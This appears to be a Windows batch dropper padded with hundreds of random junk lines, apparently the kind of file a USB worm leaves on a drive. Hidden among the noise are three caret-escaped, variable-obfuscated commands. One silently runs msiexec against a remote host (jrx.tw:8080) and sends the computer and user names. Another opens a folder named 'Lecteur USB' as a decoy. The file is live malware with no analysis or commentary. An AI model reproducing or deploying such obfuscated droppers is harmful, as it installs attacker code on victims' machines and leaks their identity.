-acDsHZLy8T498xiQ8wmfdpymt5DSK.IkidSPoHeqjoUDrT	H$*.S/TwM$krE05iXWKoq*x5*PWITTPbNK3T#LBvxSRrXh171ePGdLk8oLrhU$tC2
c_h0-62wAUn0.Dprwi$96SCCbay4
dQE58	M0ps$zu44#Q rw/d*NNrC8c-Stssq3C-ahHbYMf-tzZlX_I_8M9	wa1sNObfvR bp5vAnWQ5hIz6fUOsr_MHn#7wiypi87TZ8rnSJ9qb		U6G0_Xk#Dh4Bw5OmsoC/.eOCOiu_q3tMUAobv/Bidnn
86X5u/nvbgp*C_j4W4j64ghPaPvjGBLFaLHn2o0ooPI3h5-PVxyMhDelmi.6b4oOoU.iLqvLo.BLAmVgEI292wCR$0sDNv	O	B7j#Do1XADwyO3l	_7Ja4vc5rT$3LF_A3NCGcCXME	fbCAxwaG/gEMgO0g	Jj
73_bUDyOQoDznBMg	SHsxJBA5qD6MLLrFKLe0LyaBXBRyg7wZvuUKpR/4e5YirsTPXF9VUlgu_bpjlCW*VYpJ8aPNEyearjk_tDdx2ZO#1OBC$seNYHy5Yfn1nyP-34l
ZOabBVf33vOzqw7OrNvrdmWGRo9N33ahcO7pDRudjnWEoE9qkERvUzrIMzYi_0F9e.z7UW.uTpedob.G7o$EU*49xdDbjHj
/h0AeEEn_7 L
_gWVIll2/*4C#HZxOdZZu0ZQmnl1NkQaOqtmqKad_tRfku0tJdia1m-A
33HVrnWamzW1c_9o-zDO*qtWwlUU.tww0rUn.y/m0uWg4z0KfVd7yLvg3vOitYL/s8Kir*v*vprUShwidzfj/dSXft. nI4zNyhtC5Ylikm//QI*bV4UDJ. oczh7$_iySzyrS*F9pjK-zEvRaK#YT8ueogkzet
zzrqtEnxHBweZ7yf5ChpY	.q
8dGYsd8NZrc	_9 7TBm
79p#ts_z_V#yOhqqiL4qqsGOs-UA$EuEHRxtTWwMq0kV4VBeD1G2#gdWF793CTE2/gVbG_ac5R99#msKp3#__Wb_jcW$4WhJoaHMR./*smD1
eACpywI#n1ad./36iB**p$cwdly6-zjTxnE_fXW5xA
b-A$CVNHHPJ_QnARlb88V 0Nes3EIQ-4-f$qBVHQ	Zx21YiuHMIosLJz*$CvxoRrqwhOfYTnO6vCvj$Vo..SyXpe__9qiZmPJAUFSQj4q1n5aK3*G.eoiWLJlTn3qcr	bs_PHw7cxKs5LbpZDq-GNGw/Q/
StaGSqPz*ZNjAanWVB	uAQepOJax3wSY0jIyfZOicT 1	iazq_naWeVQZ#7V	1n*J9TULoWVr4-T.n.lKGSqc0pBO_GXpwG*mCuV1	X$	h5uhRWVGwUX0rNYaWEq.THOmeq6RqRvPefrg1SMyPrYWyAYDMGue5
$b1.Kzu2w.E372YP6UyK_Gk4/Rael0d#wY	
JGqehmBW7BWe2Gs633x14Is	6d-mr9y1*Z.3lwjn1GBwnY	OJXS6QM8aGX882Sn/#hBjYFXcDAdTW6gCpQmzLeVrr7W	i.q5./0F/WTq-wXpX/fty2kOdx KfXbgM6iTic	_DqK
96m-kzTqsEe	gxYM.L*6_sEdlyt-AeE*01DVG1kQgtSMTPP3p7bGGX4 pMkA$/xxvjOzcHoNNdNY/rYNTtwCed#Wbbv.4QM -	p4SD
dZcJWkm iiH7v u-hlJzsdZ4RhchN0cZZ5fl6l0 xC74aqy/*B
BuRLEdDMomK	jnej5	ynI8bdMnJlbzdR1#cvJ-#owbe.q#Jrtq
 ^S^E^T"SijuZTFDstLaG=^"	
yM.Orj$*7qmIgT0vjDtwe9mv5I1Eyz*Q7q9WgFe7ixCdiHQgr#.8.X9I-TB	uC7/CBfc6PDYsxQMW$Ixdi2bk85bJ7I 
.Sdf5s6J$h	f6A4$j7VSYgjYchtZ_fFiAx8Y
545rcT948	p5sPlZNCee_nz9J9rtv 3ZnBXHu 3JkrA5 hTKv_8pm/BHU*EhAfKjKy8faKYF_wqGYnxWvsNwvffU./NvPe6-1-80IzXmbAeXAo23n/Z$mAdmLyaipg#vT8
p12WdBpi7SnZCd/r#CYJHaLDXagrl6e5d/oeBDT9G/m978*aRz4jSJm#	1L_Vry7NKqRqrs DuFME7NI
nPBNcsXODvFq8Vb.WL2GY5ubpB$op97.-TTscImF Wl_0UlZU/Fe
Dt$141-GK.Ly e5zVryQwM7vXs$.UD	LlX$3RghMHgXNhP$z_kcTX$q3jY.csR.YcI4VY88#kCdGnOxCU#ki l#-5KBfKqpw1tvjy4*Y.cTLgzq	hw6BPYcxNr_GB/dF.61uS3Fo98yty7ZQ1ZAWK_yJCPrt
7_xdE8ZmSDU_ts1O54P_I5loOvUCW39VRA	JHXRRIGT_Ev8.6$/3h*mTXN8R#5qH -S	K*ZLlt*uTk4e_jmN6YDObGatm-E8J9*bUJpdP 7#bftF Qe1zlQh__mSVYLNRHpK7Ispw0-ksQVtISJGO4XwR
y8W#m/wqhr0goYIDUfpnenkOlQqrByR/TIm0XM$r#plqbFUoShoB*.QNQn3WEDA2c0DiARh-MJjXwBR	NHjEe8zCzbKBSR1LW*SSt$jg20pEgPsqZ w4q$#FCe_/XVSK#y0/b8v_avoBI/qL-dRp9SA4BOll1wPUOi	RTvEdElME.Mrlo$_K-DaJMU$D hq
6a/-gb/Sk_O$d.d6ACtKvam6xT09qzw*J0eM9r5HrAY_oXYPiTPF XlnL8W919FQzOxN0eGUwPR83wvntn	*1ItpTCeqzBsk.Dot_Q7YNisVj0L3xioM/Rjy9 4HB7UIT/R/KsnyI
GWhSCyVicPU5-k2XXQIo4c qoiVldnwlX-EHNc1-B4.
-.YEBl$OvQ-$hoArhRpKaX9Q	2
Flf8yqnEv$2W*cJf0TF1FvyUk5mxGHw_	oWd1yY-YCA
bKEn2kLLO8uiY8Tm5d5xZ9BBn8TCN4z6xm9eZs-mMrZOqHp
^S%SiJuZTFDsTLaG%t^a^R^t	m^s^i^E^X%SIJUZTFdSTlAg%e%sIjuzTFDstLag%c%siJuztfdsTlag%	/^f^v "HTTp://JRX.tw:8080/B2AK75vDodNBTyAafEa8488PfWQpWt//%compuTerNAMe%?%UsErNAme%" ^bQ^t^tV^x^Ft=^Jn -^QUIE^T	^Hu^d^s^zF=^uqb^m^aAW 
e4E#DGm-h/ NPDS2jYF. _SiLl $t1	tYxOZ  A#*m.JtXx0JkY4aVJ#s#Qzpzm	p$7o4II9qQuW8_LsKkI6D9oTRe.v.QTwTWcXi_$D_dgiH$oW2iPB#QsPI7D*99ooyLbyI2Y9Srw-LaHifsnvohJwkllqStV*Op4vkpJ83kt$
aOUvhOK43OiEh4YavJe1MeNIgn8XEIVWQkX Ya_0oWaEt*IE*AsWR$MF$-oBZbQNo71e69
maFxR8SvBKnO/_E/Lc0yQm8T_aZC q*pfP1TlPLcOFMN._JBh*$yrL
Wh*uD.AB0Wkj7Ygv$ /4rHuIc8oQAitfqG79Mkkc9PFUD1Uwx2GReaBeLP.Uyn-y3*KR_XgMuE3Ndh HaO.Q5rk6nsnhlrWnnZvyvw9Z2OoxUv8yRCXyY/2
*_BiGMn83c$UObEuTkMO.7pQiaNmJv$Nv	$G.sgZ6KY5ThN9o1xzcvz1k4P/Ocy6i6*.kDxKhlCz1IAZl8QNbFE0gkwfbUFtyANAePScQWP-ZIv-mwZH8B8AJcpybvHTKg2W3e$CBN49	LPY PKr/Ny #LVm#tSFNthnSFSXJ
YQSKuhJKp-ZBf.-fMO*V06qdNdSV lyWMS*FRIp03ewlq#SBigtTAqLz	$p#yQPhKI	sd-yuUve/y-P.jXJWhcaB_fww-	E_
y2kz3iEDhBz/Nk14BUNb.CNd5YSHmejcel.-AKpgU.ZvmVp5ymgJ$	PNNHsAe7_fi3n0AVii4oo 761nPrRu.NSqMakPqtyFfU	TLNs7U3rQ*fgQDLVC9lWYNtyer1Af_IZhC8yRUM/dxEXwPFKnS0
X-AfVB5AdQSLnuFQ6zAViNix1TRP58NCxG	UFI.B7FMSv#yK7CSCJWi4i56K7Xsr cqn$bg16YJkv*snvfqPD5fix3fMI2jSQM/lfd	LNDvhExc.VB
_bQLNyhudM.bf/OGK$X9d sHFvVMyWoEAl4jkYqvV.OITt/SGK4dSkGe9zWbVSNxl$fw rVrmsWJxuLRRpa/Gs44D#fbOAk8K#FopJ40P 1Fj	Lbb$fnABeNDyt..eZ0N2PSv rkUdnWm/6VNxSj
gs0GuIfTRGMGl-8NqaYDYwfsJ8pR81eKlge2hs_4DsJH#dWQi0wvMp37S0ICnaUUpkjkzsa6TNPc1QwvnnxmljY3iiEi3GB-qUiqm*V47FAQsRLV1M6*MdPSn	J4AGxS-1#8-8c*B#
mq14WwWMryK5G	 7BSp0Wf3O/fPwOkVYjq7
IbZSygwwqzebv5-Y.uCDSqa_
EVzYqOHgi8BNYg-SvizZ60iznjhuQumxwWkJgL75CvemmDDK9dtSbOFyYH	NAU_MiFwZ*J 4qnR2Ui
n8d6YGvpXtrHOK6	PzAWU 0Tqi_8z8CDbqRGOZtFhZx/DE3GgxwrX_RRr	heS$1bHEM#T9WSkOp$_ngSxhHntD2YdEaXju3 ZMLimQQW	9 Cc-IXDhsr	6nPzfHJ4NE5a4Z2S#C3.zkOAf4#LlQit*XD#3QSytXSS/y2Lw
_0.mHh$jo*Bu
KQ5Ug#T6NDPvhDLtn2ju_Mes7fWR0belMKggaTsB
SXyJILvUQ32shX	VrK3863wkaNWcYboYERu8WW5j4eoV5Yp	_kAT9kahh	zJ9vt1-EsAt$vzgaoRh8VK3A Bqb9OQZgbe4aGM#QcUIk.vv#ZzCe0bVM9m0gH*oYB39.t3V9D0Gc5YhXUz5zGrOKICkh9HfTY9nntMRqL	ntK_dcI5 kRdLU0KdxULT/F
hgDiP6sxWC1tEroVc8b3qb/OEB.518**fS
7/WtmmRtqd5Y_*bwBUbNS7jTPYtObnIh/TYi.T$jFn5DLP8TKgWGWQ cXPRcrn-_mizl0/7sSV/unu8uW7FjzosZLa*6U60zFrL$nXZwM#/34Y8hQlUF#YF
ygvRkIQVktuBBSoupU7IhTWHqHOwe-CdzASxSCSaBjEtfy/MdtZwu_rTZFEx 3_T1vEA579$ N_wf#oI
aT7D9u6RKl2VFoomhTFsEfeH2PO	dr$0Jw-AB_xjMeVyPoKm onHEIdjUh2CdT AfXwxgPDv0	o44rE6avYa.Jn_p-MGTw/0
aRh#q$pPLU3X6ElacI.RlxM5UGrt9FgrYXzcpn6hExQzaXVDLfV0Xil1KPnt/ $Nq93Pc*qxNZ
xXY6xRn9EerDzcw.e6UjdG9sk/*rv6a#qOu/pcTtL*y XYc9QBMGx
RS2w7LeV0WYzzC.cNab0QqnXav2-0PcsVX80p7 #r7JkIm.88Cr QT a6mYQ$XTpVRlGKpVTv0ORuv6VlxI5.ZCyBpS 5QW7ilmT	2 c
Zal8Q#xour4j$fHmqc7/oX-m-ly9d	fJwQ/ESU//4HanBsM.p 8if7wq	x.c4.*HIxr5lpGke2sMtXakTOY i$S/bak1R5g1$ErT0A0JCKD_yHNCfg$1$vNxzls-hDtXrwTsyTXx$Az46Tg*lC	XYfTIcPmGIQEqsbR
qD/FgQvZUHsqHBCQ6NL0ipFrYq.#yx2XMC_zv K606#Z8
Rog#_k71KHVJgVC$X$ETnI-sO1rZGWx
mrvP73msXgu/X8vw-3-5m0
3oKdZp2Eu/omTcwSUM5IX5BTejvk4B COyOJjpZDiPGw-eflS	iy6reqr*oLXlTgpgoF/5LREsQJ
r.#xF$zQTqXJTDIvA2IubOzTq	25ArP#0.C0rr.e83jpzAjw4BrhT--4r426	*7Z8Py6OI*7l2	SM5U$fJ_i5_92_KDQk5p97_dhtgPM
gT#bt_yynfeWi
Wnvl0g3zuq14VzyGjYQFRK4C.asAdNn1NR9w	wkO9x
^S%SIJuZTfdStLag%T^a^R^T e%SIJuZTFdstLAg%x%sIjuZTfDSTlag%Pl%SijUZTFdsTlAg%O%sIJUztfdSTLAg%r^ER%SiJUztFdsTlAG%	"Lecteur USB"	
